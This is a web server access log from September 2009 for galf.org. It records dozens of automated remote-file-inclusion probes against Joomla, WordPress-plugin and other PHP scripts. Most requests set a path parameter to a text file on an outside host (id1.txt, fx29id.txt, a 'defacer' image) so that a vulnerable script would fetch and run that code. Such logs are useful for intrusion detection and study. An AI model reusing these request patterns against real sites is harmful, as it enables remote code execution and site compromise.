221.143.40.39 - - [21/Sep/2009:10:43:08 -0700] "GET /logs/access_090316.log%20%20//?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:43:08 -0700] "GET /?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:43:08 -0700] "GET /logs//?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 200 4788 "-" "Mozilla/5.0" "www.galf.org"
209.188.112.28 - - [21/Sep/2009:10:46:20 -0700] "GET /logs/access_090518.log%20%20/?sourcedir=http://shulamusic.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.188.112.28 - - [21/Sep/2009:10:46:20 -0700] "GET /?sourcedir=http://shulamusic.com/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
209.188.112.28 - - [21/Sep/2009:10:46:20 -0700] "GET /logs/?sourcedir=http://shulamusic.com/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:46:34 -0700] "GET /include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:46:34 -0700] "GET /logs/access_090309.log%20%20//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:46:50 -0700] "GET /logs/access_090824.log%20%20//viewbody.html?code=http://singingcamel.com/defacer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:48:50 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.51.114 - - [21/Sep/2009:10:49:20 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:49:35 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:55:50 -0700] "GET /logs/access_090330.log%20///main.php?appserv_root=http://singingcamel.com/defacer/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:55:50 -0700] "GET //main.php?appserv_root=http://singingcamel.com/defacer/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:55:50 -0700] "GET /logs///main.php?appserv_root=http://singingcamel.com/defacer/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.15.230.189 - - [21/Sep/2009:11:02:08 -0700] "GET /plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=http://www.telephone114.com/bbs/data/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [21/Sep/2009:11:02:09 -0700] "GET /plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=http://www.telephone114.com/bbs/data/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [21/Sep/2009:11:04:12 -0700] "GET /logs/access.log/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=http://www.telephone114.com/bbs/data/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [21/Sep/2009:11:04:12 -0700] "GET /plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=http://www.telephone114.com/bbs/data/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [21/Sep/2009:11:04:12 -0700] "GET /logs/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=http://www.telephone114.com/bbs/data/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [21/Sep/2009:11:04:52 -0700] "GET /logs/access.log/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=http://www.telephone114.com/bbs/data/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [21/Sep/2009:11:04:52 -0700] "GET /plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=http://www.telephone114.com/bbs/data/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [21/Sep/2009:11:04:52 -0700] "GET /logs/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=http://www.telephone114.com/bbs/data/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:11:04:54 -0700] "GET /logs/access_090525.log///main.php?appserv_root=http://singingcamel.com/defacer/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.114.220.160 - - [21/Sep/2009:11:06:15 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://shulamusic.com/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.220.160 - - [21/Sep/2009:11:06:15 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://shulamusic.com/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.220.160 - - [21/Sep/2009:11:06:15 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://shulamusic.com/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.220.160 - - [21/Sep/2009:11:06:15 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://shulamusic.com/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.220.160 - - [21/Sep/2009:11:06:15 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://shulamusic.com/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.220.160 - - [21/Sep/2009:11:06:15 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://shulamusic.com/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.11.145.8 - - [21/Sep/2009:11:06:21 -0700] "GET /logs/access_090824.log//viewbody.html?code=http://singingcamel.com/defacer/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:11:06:21 -0700] "GET /viewbody.html?code=http://singingcamel.com/defacer/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:11:06:22 -0700] "GET /logs//viewbody.html?code=http://singingcamel.com/defacer/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:11:06:28 -0700] "GET /logs/access.log//viewbody.html?code=http://singingcamel.com/defacer/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.114.220.160 - - [21/Sep/2009:11:07:47 -0700] "GET /logs/access.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://shulamusic.com/idxx.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.220.160 - - [21/Sep/2009:11:07:47 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://shulamusic.com/idxx.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.220.160 - - [21/Sep/2009:11:07:49 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://shulamusic.com/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.220.160 - - [21/Sep/2009:11:07:49 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://shulamusic.com/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.220.160 - - [21/Sep/2009:11:07:50 -0700] "GET /logs/access.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://shulamusic.com/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.72.216 - - [21/Sep/2009:11:10:23 -0700] "GET /logs/access.log/e404.php?DOCUMENT_ROOT=http://www.koryochemical.co.kr/board/download/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:11:11:16 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:11:11:16 -0700] "GET /logs/access_090511.log//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:11:11:16 -0700] "GET /include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:11:11:21 -0700] "GET /logs/access_090309.log//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:11:13:50 -0700] "GET /include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:11:13:50 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:11:14:06 -0700] "GET /logs/access_090824.log%20%20//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:11:14:06 -0700] "GET /logs/access_090309.log%20%20//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.55.165.80 - - [21/Sep/2009:11:15:35 -0700] "GET /logs/access.log/export.php?noSet=0&includedir=http://arda.or.th/userfiles/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.55.165.80 - - [21/Sep/2009:11:15:35 -0700] "GET /export.php?noSet=0&includedir=http://arda.or.th/userfiles/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.55.165.80 - - [21/Sep/2009:11:15:35 -0700] "GET /logs/export.php?noSet=0&includedir=http://arda.or.th/userfiles/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.55.165.80 - - [21/Sep/2009:11:15:36 -0700] "GET /logs/access.log/export.php?noSet=0&includedir=http://arda.or.th/userfiles/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.55.165.80 - - [21/Sep/2009:11:15:37 -0700] "GET /logs/export.php?noSet=0&includedir=http://arda.or.th/userfiles/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.55.165.80 - - [21/Sep/2009:11:15:37 -0700] "GET /export.php?noSet=0&includedir=http://arda.or.th/userfiles/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
189.192.125.42 - - [21/Sep/2009:11:16:31 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.es/search?hl=es&rlz=1T4GGIK_esMX269MX273&q=lesbianas&start=90&sa=N" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.galf.org"
189.192.125.42 - - [21/Sep/2009:11:16:32 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:11:20:00 -0700] "GET /modify.php?dir_module=http://rox-crime2.no-ip.org:8080/scan/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:11:20:00 -0700] "GET /logs/access_090504.log%20%20/modify.php?dir_module=http://rox-crime2.no-ip.org:8080/scan/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:11:20:00 -0700] "GET /logs/modify.php?dir_module=http://rox-crime2.no-ip.org:8080/scan/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [21/Sep/2009:11:21:38 -0700] "GET /logs/access_090824.log/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=http://www.telephone114.com/bbs/data/id2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:11:22:22 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:11:22:23 -0700] "GET /logs/access_090420.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:11:22:23 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:11:23:21 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [21/Sep/2009:11:23:21 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [21/Sep/2009:11:23:21 -0700] "GET /logs/access.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
204.15.230.189 - - [21/Sep/2009:11:24:04 -0700] "GET /logs/access_090824.log/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=http://www.telephone114.com/bbs/data/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.234.21.38 - - [21/Sep/2009:11:27:14 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://leoboy1.fileave.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.234.21.38 - - [21/Sep/2009:11:27:14 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://leoboy1.fileave.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.234.21.38 - - [21/Sep/2009:11:27:14 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://leoboy1.fileave.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.27.203.107 - - [21/Sep/2009:11:33:31 -0700] "GET /logs/access_090817.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [21/Sep/2009:11:33:31 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 4807 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [21/Sep/2009:11:33:31 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [21/Sep/2009:11:33:45 -0700] "GET /logs/access_090316.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:11:34:09 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:11:34:09 -0700] "GET /logs/access_090713.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:11:34:09 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:11:35:59 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [21/Sep/2009:11:39:44 -0700] "GET /logs/access_090713.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:11:39:44 -0700] "GET /logs/access_090810.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:11:52:12 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:11:52:12 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:11:52:12 -0700] "GET /logs/access_090413.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:11:52:21 -0700] "GET /logs/access_090427.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:11:52:44 -0700] "GET /logs/access_090518.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:11:53:00 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:11:53:03 -0700] "GET /logs/access_090413.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:11:53:05 -0700] "GET /logs/access_090427.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:11:53:22 -0700] "GET /logs/access_090420.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:11:53:57 -0700] "GET /logs/access_090420.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:11:54:00 -0700] "GET /logs/access_090803.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:11:59:01 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
216.17.99.13 - - [21/Sep/2009:11:59:01 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
216.17.99.13 - - [21/Sep/2009:11:59:01 -0700] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
216.17.99.13 - - [21/Sep/2009:11:59:16 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
216.17.99.13 - - [21/Sep/2009:11:59:16 -0700] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
216.17.99.13 - - [21/Sep/2009:11:59:16 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
216.17.99.13 - - [21/Sep/2009:11:59:23 -0700] "GET /logs/access_090420.log//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:11:59:23 -0700] "GET /logs/access_090420.log//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.231.187.33 - - [21/Sep/2009:11:59:57 -0700] "GET /logs/access_090803.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
193.231.187.33 - - [21/Sep/2009:11:59:57 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
193.231.187.33 - - [21/Sep/2009:11:59:57 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
217.173.25.215 - - [21/Sep/2009:12:04:13 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
217.173.25.215 - - [21/Sep/2009:12:04:13 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
217.173.25.215 - - [21/Sep/2009:12:04:13 -0700] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
217.173.25.215 - - [21/Sep/2009:12:04:24 -0700] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.184.252.3 - - [21/Sep/2009:12:09:22 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:09:22 -0700] "GET /logs/access_090413.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:09:25 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:09:45 -0700] "GET /logs/access_090427.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [21/Sep/2009:12:10:13 -0700] "GET /logs/access.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
217.173.25.215 - - [21/Sep/2009:12:10:19 -0700] "GET /logs/access.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [21/Sep/2009:12:10:53 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://rox-crime2.no-ip.org:8080/scan/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:12:10:53 -0700] "GET /logs/access_090302.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://rox-crime2.no-ip.org:8080/scan/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
